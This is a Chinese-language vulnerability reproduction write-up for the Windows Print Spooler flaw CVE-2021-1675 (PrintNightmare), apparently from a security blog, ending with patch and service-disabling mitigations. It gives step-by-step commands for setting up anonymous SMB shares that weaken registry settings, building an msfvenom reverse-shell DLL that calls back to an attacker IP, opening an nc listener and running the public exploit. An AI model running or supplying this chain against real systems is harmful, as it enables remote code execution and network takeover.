文章来源: Timeline Sec
Windows Print Spooler是Windows的打印机后台处理程序,广泛的应用于各种内网中。
* Windows Server 2019 (Server Core installation)
* Windows Server 2012 R2 (Server Core installation)
* Windows Server 2012 R2
* Windows Server 2012 (Server Core installation)
* Windows Server 2012
* Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
* Windows RT 8.1
* Windows 8.1 for x64-based systems
* Windows 8.1 for 32-bit systems
* Windows 7 for x64-based Systems Service Pack 1
* Windows 7 for 32-bit Systems Service Pack 1
* Windows 10 Version 1607 for x64-based Systems
* Windows 10 Version 1607 for 32-bit Systems
目标域:
Linux配置smb匿名访问:
1、修改/etc/samba/smb.conf文件
[global]
map to guest = Bad User
server role = standalone server
usershare allow guests = yes
idmap config * : backend = tdb
smb ports = 445
[smb]
comment = Samba
path = /usr/share2
guest ok = yes
read only = no
browsable = yes
PS:
对于 [global] 只需要把 idmap config * : backend = tdb 前面的分号删掉,然后再添加一条 smb ports = 445 即可,其他项都是默认的,最后把整个 [smb] 添加上去
2、重启samba
service smbd restart
3、创建共享文件夹
mkdir /usr/share2
Windows配置匿名访问:
mkdir C:\share
icacls C:\share\ /T /grant "ANONYMOUS LOGON":r
icacls C:\share\ /T /grant Everyone:r
New-SmbShare -Path C:\share -Name share -ReadAccess 'ANONYMOUS LOGON','Everyone'(powershell下运行不适合win7)
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionPipes /t REG_MULTI_SZ /d srvsvc /f #This will overwrite existing NullSessionPipes
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionShares /t REG_MULTI_SZ /d share /f
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /f
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v RestrictAnonymous /t REG_DWORD /d 0 /f
git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py install
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.3.55 LPORT=4444 -f dll -o /usr/share2/shell.dll
msf 和 nc开启监听都可以
nc -lnvp 4444
exp地址:https://github.com/cube0x0/CVE-2021-1675
python3 CVE-2021-1675.py test.com/win10:"windows10>?"@192.168.3.3 '\\192.168.3.55\smb\shell.dll'
虽然报错了 但是已经收到了shell
1.官方建议:
目前官方已发布漏洞修复补丁,建议受影响用户尽快更新漏洞补丁。
https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1675
2. 临时防护措施:
若相关用户暂时无法进行补丁更新,可通过禁用Print Spooler服务来进行缓解:
1)在服务应用(services.msc)中找到Print Spooler服务。
2)停止运行服务,同时将“启动类型”修改为“禁用”。
参考链接:
https://github.com/cube0x0/CVE-2021-1675
侵权请私聊公众号删文